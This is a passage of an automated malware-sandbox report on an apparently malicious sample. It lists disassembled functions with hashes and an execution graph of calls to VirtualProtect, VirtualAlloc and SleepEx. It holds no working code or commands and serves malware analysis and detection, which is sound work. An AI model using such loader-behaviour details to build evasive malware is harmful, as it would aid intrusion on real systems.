                                      • Instruction Fuzzy Hash: E8E1F4B4D092298FDB20EF69C988AE9B7F6FB49700F1085E9D40DA7290DB345AC5CF51
                                      Function 05C6E588 Relevance: .3, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ea0f5be104796e39d7b2c7d88e67974bbcfb57d80a55af82aa4f71113d3b2bf
                                      • Instruction ID: d637ae143f319ad4756fce9fe06319638eb9c42003a4d6d8e4b7d9cb20d8e2e4
                                      • Opcode Fuzzy Hash: 6ea0f5be104796e39d7b2c7d88e67974bbcfb57d80a55af82aa4f71113d3b2bf
                                      • Instruction Fuzzy Hash: 67E12874E01218CFDB64DFA9C988BAEBBF6FB49304F1085AAD009A7291D7745E84CF15
                                      Function 05C6E579 Relevance: .3, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4da588c564f5a9be2fe5a34e5bc91fcb21d57144dc6bae0a8312c8d79452b65
                                      • Instruction ID: c67a726b6ca00d900ab6788c4903283e78329a403abbd0ca4391bfa5cccc1f62
                                      • Opcode Fuzzy Hash: c4da588c564f5a9be2fe5a34e5bc91fcb21d57144dc6bae0a8312c8d79452b65
                                      • Instruction Fuzzy Hash: 15E12774E01218CFDB64DFA9C988BADBBF6FB49304F1085AAD009AB291D7745E84CF15
                                      Function 05CB51CB Relevance: .3, Instructions: 300COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614103727.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5cb0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c23398f66f8db473109e6d1595ee5ac3d6074a00698a14166ac06daef7d444f
                                      • Instruction ID: 70dc90e18c30d6fc6db3f3fff8ee25edffca022fea605cee0890a96a39bd08d5
                                      • Opcode Fuzzy Hash: 9c23398f66f8db473109e6d1595ee5ac3d6074a00698a14166ac06daef7d444f
                                      • Instruction Fuzzy Hash: C3E1F370A05218CFEB65DF69D888BEAB7B6FB89304F1081E9D409A7354EB705E81CF45
                                      Function 05CB71B8 Relevance: .3, Instructions: 256COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614103727.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5cb0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c6618aeda70e3a3e48ae8b917edc21a69edd728730996a13da743413e177a2d8
                                      • Instruction ID: 2e0f8cb930dbf76bcb781f50bd4fb2503cd53419d00f87336206e25ec778f1b7
                                      • Opcode Fuzzy Hash: c6618aeda70e3a3e48ae8b917edc21a69edd728730996a13da743413e177a2d8
                                      • Instruction Fuzzy Hash: CCB1C270E04208CFEB14DFAAD488BEDBBF6FB89304F108569E809A7255DB7099458F15
                                      Function 05CB71A9 Relevance: .3, Instructions: 255COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614103727.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5cb0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2939e15055ab0700539c7379a9c1dc72ea6e2e64922449facd7de8f8a85712b3
                                      • Instruction ID: 0fd57f97b2aa0eab6748e67a9384b8acc41604058c461133177769113105e755
                                      • Opcode Fuzzy Hash: 2939e15055ab0700539c7379a9c1dc72ea6e2e64922449facd7de8f8a85712b3
                                      • Instruction Fuzzy Hash: 54B1C174E04208CFEB14DFAAD488BEDBBF6FB89304F10856AE809A7355DB7099458F15
                                      Function 027B2B47 Relevance: .2, Instructions: 233COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 268c550f10d950499f4e565c9df5cee5da8c8962602f7941e385d685d57b974f
                                      • Instruction ID: 871ca103c65af5c74ab3b0b5bc674cfebc882a60665f6b4bf9b4f9ebe348c5fd
                                      • Opcode Fuzzy Hash: 268c550f10d950499f4e565c9df5cee5da8c8962602f7941e385d685d57b974f
                                      • Instruction Fuzzy Hash: 0EC19C74D02229CFCB66DF29C888BD9BBB5BF49300F1481EAD80DA7261DB315A85CF04
                                      Function 05AAB560 Relevance: .2, Instructions: 229COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cccbbdeffece8d75bdb1fe782a9d9c94f23ea6314da551c6b9530229aadf029b
                                      • Instruction ID: e4718d114210532ec1d0d4246402aac48702ffeb84a569d42c97fdbaf3acd873
                                      • Opcode Fuzzy Hash: cccbbdeffece8d75bdb1fe782a9d9c94f23ea6314da551c6b9530229aadf029b
                                      • Instruction Fuzzy Hash: 9891CDB5D0520ECBDB14CFA9D548AEDBBF2FB8A304F10902AD41AB7240D7754A89CF65
                                      Function 05AAB570 Relevance: .2, Instructions: 227COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e35a468d4376cad66ccac5c21b887f6892152acef51ccc63f1e7166ba4a39848
                                      • Instruction ID: e70703ee1efad47f1f9ddbe2e3001b805baf583c26add2ff26dc9569b686fd27
                                      • Opcode Fuzzy Hash: e35a468d4376cad66ccac5c21b887f6892152acef51ccc63f1e7166ba4a39848
                                      • Instruction Fuzzy Hash: C591CDB5D0520ECBDB14CFA9D548AEDBBF2FB8A304F10902AD41AB7240D7744A45CF65
                                      Function 05F9E110 Relevance: .2, Instructions: 211COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efac67cec802a88a6ec745dae0fa0efcca981c8b0cd186780d4e999c8b7cf212
                                      • Instruction ID: 51abf0dbc2cc314df5ca434339da550c0cdf3e3a4efecc3f91fc14c5f8f4cc11
                                      • Opcode Fuzzy Hash: efac67cec802a88a6ec745dae0fa0efcca981c8b0cd186780d4e999c8b7cf212
                                      • Instruction Fuzzy Hash: 87910971D04718CFEF28DFA9C844BADBBBABF49300F1490A9D509AB251DB789985CF01
                                      Function 05C67F30 Relevance: .2, Instructions: 211COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0098946e960ee2b26e358c9c4df549ac0100e0c3c681d4081635b9401863dc8
                                      • Instruction ID: fe49bcf0121ec2893abf685fdf481a234b9802699e1b466fa1fc07e27435865d
                                      • Opcode Fuzzy Hash: a0098946e960ee2b26e358c9c4df549ac0100e0c3c681d4081635b9401863dc8
                                      • Instruction Fuzzy Hash: 95911574E00208CFDB14DFA9D888BAEBBF2FB89304F1085A9D449A7244DB745A86CF55
                                      Function 05C67F40 Relevance: .2, Instructions: 210COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 312f3ddbbe83a3998a3ce16ed3264fd1ca514ebd1381db2dc727d39360ae0f8a
                                      • Instruction ID: 71b387200192b03ff28947963cf84ddc992e4652c69a374935d546c88f4bf99c
                                      • Opcode Fuzzy Hash: 312f3ddbbe83a3998a3ce16ed3264fd1ca514ebd1381db2dc727d39360ae0f8a
                                      • Instruction Fuzzy Hash: A6912874E00208CFDB10DFA9D888BEEBBF6FB89304F1085A9D449A7244DB745A86CF55
                                      Function 027B1F18 Relevance: .2, Instructions: 174COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7987f564b816850956c30d1fcf604392628cbf9cbd581f26b8344553eca3e402
                                      • Instruction ID: 559349fc2513762c4137ecf4449bf336dceb7d1d018748fceb57497d44093b4a
                                      • Opcode Fuzzy Hash: 7987f564b816850956c30d1fcf604392628cbf9cbd581f26b8344553eca3e402
                                      • Instruction Fuzzy Hash: 5471F970E016099FD719EF7AE844A9ABBF7BFC9300F14C57AD005DB268EB30590A9B44
                                      Function 027B31D2 Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0199601b7227322daea02f947d455ebc9507f23df46567712630b0e457075c1c
                                      • Instruction ID: c7f07da9e5d70b05b073aa0bb68a5e4976606306f223882cf05550a6b2ea3c45
                                      • Opcode Fuzzy Hash: 0199601b7227322daea02f947d455ebc9507f23df46567712630b0e457075c1c
                                      • Instruction Fuzzy Hash: 1891CE74D42229CFDB66CF25C888BE9BBB9BF49301F1494EA980DA6255DB305BC5CF04
                                      Function 027B1F28 Relevance: .2, Instructions: 165COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd5538b724c66f545c9c1b98e3d23d1c519d5ecc7c2ee5299180d530d30b8b6f
                                      • Instruction ID: 096f50819a754da272575d66f818e730688dc440896c393897b0ea89f5397a87
                                      • Opcode Fuzzy Hash: cd5538b724c66f545c9c1b98e3d23d1c519d5ecc7c2ee5299180d530d30b8b6f
                                      • Instruction Fuzzy Hash: BE71F970E016099FD719EF7AE844A9ABBF7BFC9300F14C57AD005DB268EB7059069B44
                                      Function 027B342C Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e12521c47e58e04f5f2aae4cff0542a69e7a7b9a5102a4c85a8a4ab29b0cd616
                                      • Instruction ID: a724205013f33b1fbaaa01f724f885d523dc0d2b1ad894ba9a311d0ff70c806d
                                      • Opcode Fuzzy Hash: e12521c47e58e04f5f2aae4cff0542a69e7a7b9a5102a4c85a8a4ab29b0cd616
                                      • Instruction Fuzzy Hash: C371BFB4D06628CFDB66CF29CC88BD9B7B9AF49305F1490EA980DA6255DB305BC5CF04
                                      Function 027B2D29 Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0545a1438c1389b367e14dd0057b1148797921ef6ae020f97414c269f7544cc0
                                      • Instruction ID: b3d39d87f1a4ad0c0ba772ea2e907ff46460853861397eca9e06dc1c12160f5d
                                      • Opcode Fuzzy Hash: 0545a1438c1389b367e14dd0057b1148797921ef6ae020f97414c269f7544cc0
                                      • Instruction Fuzzy Hash: BB71B0B4D06228CFDB66CF29CC88BD9B7B9AF49305F1490EA980DA6255DB305BC5CF04
                                      Function 05B9648A Relevance: .1, Instructions: 128COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffc665774ac788198633169719534da1169ef585a3f6749fbbf39501e56e8a2
                                      • Instruction ID: 8a54f308daa1220980def4ffe80a54425749a5ac97089371750904a9aa05752f
                                      • Opcode Fuzzy Hash: dffc665774ac788198633169719534da1169ef585a3f6749fbbf39501e56e8a2
                                      • Instruction Fuzzy Hash: 9A4149B1E016198BDB18CFABD94069EFBF3BFC8300F14C17AD948AB254EA3459458B54
                                      Function 027B24B3 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad5547e244f749253ec63faee9b052f70af1b41d3ea63e055b4e69bdbafdeccf
                                      • Instruction ID: 9cfb20e69cdca5bf927ec9d256ec69df037c2ca2de229c844c44bbd5bc3aaf85
                                      • Opcode Fuzzy Hash: ad5547e244f749253ec63faee9b052f70af1b41d3ea63e055b4e69bdbafdeccf
                                      • Instruction Fuzzy Hash: 8D513E71D016188BEB6CCF278D547DAFAF3AFC9304F14C1FA994CA6215DB300A958E40
                                      Function 05AA0764 Relevance: .1, Instructions: 117COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b98a58dbfe235371e6575ff2387ae1ac2849b3dca58b9bceda7423d39093d4e8
                                      • Instruction ID: 47075301e28c352b21721cb5115fb66991600f5db6fc6f9a3a4b70649195cc35
                                      • Opcode Fuzzy Hash: b98a58dbfe235371e6575ff2387ae1ac2849b3dca58b9bceda7423d39093d4e8
                                      • Instruction Fuzzy Hash: B441DEB1D05248DFDB14CFA9D988AAEBBF1BB09300F209129E825A7250D7749885CF89
                                      Function 05AA0770 Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d277df436dab668754dbb6a6105e3ce55e9632b63255c712e2f97a0967e5ddb1
                                      • Instruction ID: c45ca7acca2c8202e28ae0fddc6245c6162b166e7ea119a0546e8a8d0b5a7098
                                      • Opcode Fuzzy Hash: d277df436dab668754dbb6a6105e3ce55e9632b63255c712e2f97a0967e5ddb1
                                      • Instruction Fuzzy Hash: 5A41CEB1D04248DFDB14CFA9D988A9EBBF1BB09300F209129E425BB254D7749885CF89
                                      Function 05B9800F Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9dd38df814e762f846e29a2dcf6261ebebe9923ee9df70aa4e4fd9c7eaee37c
                                      • Instruction ID: 39bc4974f8e14bec9169b1f504dffda244c9c21a81036f90fd61616d17f7af37
                                      • Opcode Fuzzy Hash: c9dd38df814e762f846e29a2dcf6261ebebe9923ee9df70aa4e4fd9c7eaee37c
                                      • Instruction Fuzzy Hash: 07416AB1E056588BEB2CCF6B8C4069EFBF3AFC9200F14C1B9940CAA229DB3115568F01
                                      Function 05B90006 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2116a0e5f81da9d38dee901a5f8064718880c91acd8ef461b4f20f37b8b8f32
                                      • Instruction ID: 85c4368d8d330e44edbcf0972c605cb15055b326935dbed43f9f63bb6f0a4d1b
                                      • Opcode Fuzzy Hash: d2116a0e5f81da9d38dee901a5f8064718880c91acd8ef461b4f20f37b8b8f32
                                      • Instruction Fuzzy Hash: 4C31EF71D057588FEB1ECF678C5028ABBF7AFCA200F05D0FA9548AB255DB300A468F11
                                      Function 05F80006 Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3dbaa8cc8b2d1ae5d8a388822d64ef8e6f34b3cbbe8037f25a77328ba887f1d0
                                      • Instruction ID: c671207b01f6ce152be4d6220496a7e1cfe4aa3197cf11d96fcd0815f0eea680
                                      • Opcode Fuzzy Hash: 3dbaa8cc8b2d1ae5d8a388822d64ef8e6f34b3cbbe8037f25a77328ba887f1d0
                                      • Instruction Fuzzy Hash: A4312FB2D047558FEB19CF67DD45799BAF7AF85200F05C0FA844CA6255EB3409868F10
                                      Function 05AAD710 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb5b85768a419a84d298ebbc8f097a1135b453524cd0ba03f972656f66c71cf4
                                      • Instruction ID: 2f9291f5cba1303de09c19b0143b8f6c79c31e082c3efc9554e2f83afad8bcf3
                                      • Opcode Fuzzy Hash: cb5b85768a419a84d298ebbc8f097a1135b453524cd0ba03f972656f66c71cf4
                                      • Instruction Fuzzy Hash: 392197B1D056588BDB19CF6BC9446DEFBF7AFC9300F14C1AA9849AB214DB350A85CF40
                                      Function 05F80040 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8ef3600f6be920d643d0ca9606ef64e7346093d274b2002633ae9fbdfaeed8d1
                                      • Instruction ID: 60fb4264cd1b81d0e559ea3e12d6135cad3d3d724e6632c6926be81526b8edc7
                                      • Opcode Fuzzy Hash: 8ef3600f6be920d643d0ca9606ef64e7346093d274b2002633ae9fbdfaeed8d1
                                      • Instruction Fuzzy Hash: 6F21BA72D046198BEB68CF6B9D48799F6FBAFC8300F44C5FA951CA6255DB340A868F10
                                      Function 05AA1BE8 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 628e4c4b626ecadebe855f2567a4c7cc6b16bb0efc0efd5e90ebad04db75d956
                                      • Instruction ID: 67e0db148265cdb558fe728e60cfebd2cf51e3e76e60b74a444d62edcdcd5208
                                      • Opcode Fuzzy Hash: 628e4c4b626ecadebe855f2567a4c7cc6b16bb0efc0efd5e90ebad04db75d956
                                      • Instruction Fuzzy Hash: E721A9B1D056189BEB58CF6BC94878EFAF7AFC8304F14C1AAC40CA7254DB7509868F11
                                      Function 05AA1BD8 Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9be3e97600f45afebb36cdc2bded4eff403c526dd91dbcb61dd9290008d744c
                                      • Instruction ID: 72d7561c511dfecd351da27ea7ba90c9472b9428e17d5cf1178a9ebcb658d1e9
                                      • Opcode Fuzzy Hash: f9be3e97600f45afebb36cdc2bded4eff403c526dd91dbcb61dd9290008d744c
                                      • Instruction Fuzzy Hash: BE219BB1D016189BEB58CF6BC94878AFAF7BFC8304F14C0AAD40CA7254DB7509868F51
                                      Function 05C6C660 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2f96693df228518b0add717f37d23b1fe663e5a001fca5d1eb78577008355c9
                                      • Instruction ID: ffbe17be9d0a96ec68feb6fdae8d7ed2db619bc4c6cf87f881b026b493868955
                                      • Opcode Fuzzy Hash: f2f96693df228518b0add717f37d23b1fe663e5a001fca5d1eb78577008355c9
                                      • Instruction Fuzzy Hash: 0C21D0B1E056188BEB28CF9BD8847DDFAF7BFC8300F14C46AD409AA254DB741A468F50
                                      Function 05C6C650 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a84bcc499956932ddc4e9ce0e04966b00f060b49beae4d5ed9e12654836635d8
                                      • Instruction ID: ef74dc34572a5f70cf759d1f5cf961a9eb1bcf7733a4b56679a1a69974784b93
                                      • Opcode Fuzzy Hash: a84bcc499956932ddc4e9ce0e04966b00f060b49beae4d5ed9e12654836635d8
                                      • Instruction Fuzzy Hash: F821C3B1D056188BEB28CFABC9947DDBBF3BF88300F14C56AD419AB254DB740A468F14
                                      Function 05AAD700 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cebd33d2707bc890b9ba96b74dd777a484d9944c6b30b12dda82e2e6fd991650
                                      • Instruction ID: b79f1b80f51d7b7e281ea412f9e4d62a3e77974471afc1f4e5afa4c6e2663705
                                      • Opcode Fuzzy Hash: cebd33d2707bc890b9ba96b74dd777a484d9944c6b30b12dda82e2e6fd991650
                                      • Instruction Fuzzy Hash: A721BA72D056588BEB1DCF6BDD446DAFAF7AFC9300F44C0BA9858AA224DB310946CF40

                                      Execution Graph

                                      Execution Coverage:9.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:107
                                      Total number of Limit Nodes:5
                                      execution_graph 48989 991e18 48990 991e32 48989->48990 48991 991e42 48990->48991 48996 99ab8b 48990->48996 49001 9926f7 48990->49001 49005 9983e3 48990->49005 49010 996ef1 48990->49010 48997 99abaa 48996->48997 49015 5620448 48997->49015 49020 562020c 48997->49020 48998 99abcf 49003 5620448 2 API calls 49001->49003 49004 562020c 2 API calls 49001->49004 49002 99265d 49003->49002 49004->49002 49006 99c3f8 49005->49006 49033 5621908 49006->49033 49037 56218f9 49006->49037 49007 99c41c 49011 996ef3 49010->49011 49013 5620448 2 API calls 49011->49013 49014 562020c 2 API calls 49011->49014 49012 99265d 49013->49012 49014->49012 49017 562046f 49015->49017 49016 562052c 49016->48998 49025 5620921 49017->49025 49029 5620928 49017->49029 49022 5620442 49020->49022 49021 562052c 49021->48998 49023 5620921 VirtualProtect 49022->49023 49024 5620928 VirtualProtect 49022->49024 49023->49021 49024->49021 49026 5620928 VirtualProtect 49025->49026 49028 56209de 49026->49028 49028->49016 49030 5620971 VirtualProtect 49029->49030 49032 56209de 49030->49032 49032->49016 49034 562191d 49033->49034 49041 5621948 49034->49041 49038 5621908 49037->49038 49040 5621948 2 API calls 49038->49040 49039 5621935 49039->49007 49040->49039 49042 562197f 49041->49042 49046 5621a60 49042->49046 49050 5621a59 49042->49050 49043 5621935 49043->49007 49047 5621aa4 VirtualAlloc 49046->49047 49049 5621b11 49047->49049 49049->49043 49051 5621a60 VirtualAlloc 49050->49051 49053 5621b11 49051->49053 49053->49043 49087 57f0a4b 49088 57f0a55 49087->49088 49092 57e91e8 49088->49092 49096 57e91e2 49088->49096 49089 57f0a93 49093 57e91fd 49092->49093 49100 57e9316 49093->49100 49097 57e91fd 49096->49097 49099 57e9316 2 API calls 49097->49099 49098 57e9213 49098->49089 49099->49098 49102 57e92fd 49100->49102 49101 57e9213 49101->49089 49102->49100 49102->49101 49105 57ed0b0 49102->49105 49109 57ed0aa 49102->49109 49106 57ed0f4 SleepEx 49105->49106 49108 57ed154 49106->49108 49108->49102 49110 57ed0f4 SleepEx 49109->49110 49112 57ed154 49110->49112 49112->49102 